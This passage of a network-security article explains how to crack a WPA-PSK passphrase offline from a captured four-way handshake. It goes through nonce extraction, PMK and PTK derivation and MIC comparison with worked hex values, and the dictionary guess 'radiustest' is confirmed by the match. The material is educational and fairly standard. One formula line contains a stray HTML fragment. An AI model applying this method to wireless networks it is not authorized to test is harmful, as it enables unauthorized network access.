Home > Articles > Security > Network Security

  • Print
  • + Share This
Like this article? We recommend

Like this article? We recommend

The Crack

First, the assumed and known values:

  • SSID: linksys54gh
  • SSID Length: 11
  • Test password from a dictionary file or STDIN (radiustest)
  • The four-way handshake is captured and stored in eapcap2.cap. (Refer to Figure 1.)
  1. Verification of capture. This part of the program verifies that all the required packets are in the capture file. This objective is accomplished by filtering out all packets that don't include the 802.1x Authentication type flag (0x888E). The remaining packets are then checked to be sure that a complete four-way handshake was captured.
  2. The packets are parsed for all relevant information. The following example lists important parts to be used during the cracking process. Figures are taken from previous Ethereal capture images.
    • Packet 1 (A>S): Provides no real data for the cracking process.
    • Packet 2 (S>A): Provides the SNonce value (green) shown in Figure 5.
      Figure 5

      Figure 5 Packet 2 with SNonce value highlighted.

    • Packet 3 (A>S): Provides the ANonce value (green) and the MAC addresses of both the Authenticator (blue) and Supplicant (red). The MAC addresses could be taken from any one of these packets (see Figure 6).
      Figure 6

      Figure 6 Packet 3 with ANonce value and MAC addresses highlighted.

    • Packet 4: (S>A): Provides the MIC value and EAPoL packet to be used when calculating the test MIC from the generated MIC Key (see Figure 7). Note that the MIC value is added after it's calculated. Until it's added, the data field is filled with 00 bytes.
      Figure 7

      Figure 7 Packet 4 with EAP frame data and MIC value highlighted.

  3. The selected test password is checked to be sure that it's not less than eight or greater than 63 characters, as required by 802.11i.
  4. The PMK is generated from the test password, using the following algorithm:
    PMK  = pdkdf2_SHA1(passphrase, SSID, SSID length, 4096)
    PMK  = pbkdf2_sha1("radiustest","linksys54gh",11,4096)
  5. The PTKs are generated from the PMK, using the following algorithm:
    <li><p> =  PRF-X(PMK,</p></li>
        Len(PMK), "Pairwise key expansion",
        Min(AA,SA) || Max(AA,SA) || Min(ANonce,SNonce) || Max(ANonce,SNonce))
    
    PTK =  SHA1_PRF(
        9e99 88bd e2cb a743 95c0 289f fda0 7bc4   ;PMK
        1ffa 889a 3309 237a 2240 c934 bcdc 7ddb
        ,32,"Pairwise key expansion",        ;length of PMK & string
        000c 41d2 94fb 000d 3a26 10fb 893e e551   ;MAC and nonce values
        2145 57ff f3c0 76ac 9779 15a2 0607 2703
        8e9b ea9b 6619 a5ba b40f 89c1 dabd c104
        d457 411a ee33 8c00 fa8a 1f32 abfc 6cfb
        7943 60ad ce3a fb5d 159a 51f6,76)
    
    PTK =  ccbf 97a8 2b5c 51a4 4325 a77e 9bc5 7050
        daec 5438 430f 00eb 893d 84d8 b4b4 b5e8
        19f4 dce0 cc5f 2166 e94f db3e af68 eb76
        80f4 e264 6e6d 9e36 260d 89ff bf24 ee7e
  6. A MIC value is calculated, using the MIC Key from the PTK and the EAPoL message:
    MIC =  HMAC_MD5(MIC Key,
        16,
        802.1x data)
    
    MIC =  HMAC_MD5(
        ccbf 97a8 2b5c 51a4 4325 a77e 9bc5 7050   ;first 16 bytes of PTK
        ,16,                     ;length of PTK
        0103 005f fe01 0900 0000 0000 0000 0000   ;802.1x data
        1400 0000 0000 0000 0000 0000 0000 0000
        0000 0000 0000 0000 0000 0000 0000 0000
        0000 0000 0000 0000 0000 0000 0000 0000
        0000 0000 0000 0000 0000 0000 0000 0000
        0000 0000 0000 0000 0000 0000 0000 0000
        0000 )
    MIC =  d0ca 4f2a 783c 4345 b0c0 0a12 ecc1 5f77
  7. The calculated MIC is compared to the captured MIC:
    Calculated MIC using EAP frame four with "radiustest" is
         d0ca 4f2a 783c 4345 b0c0 0a12 ecc1 5f77
    
    Capture MIC is
         d0ca 4f2a 783c 4345 b0c0 0a12 ecc1 5f77
    
    CALCULATED MICS MATCH!!! Congratulations, the PSK is "radiustest".
  • + Share This
  • 🔖 Save To Your Account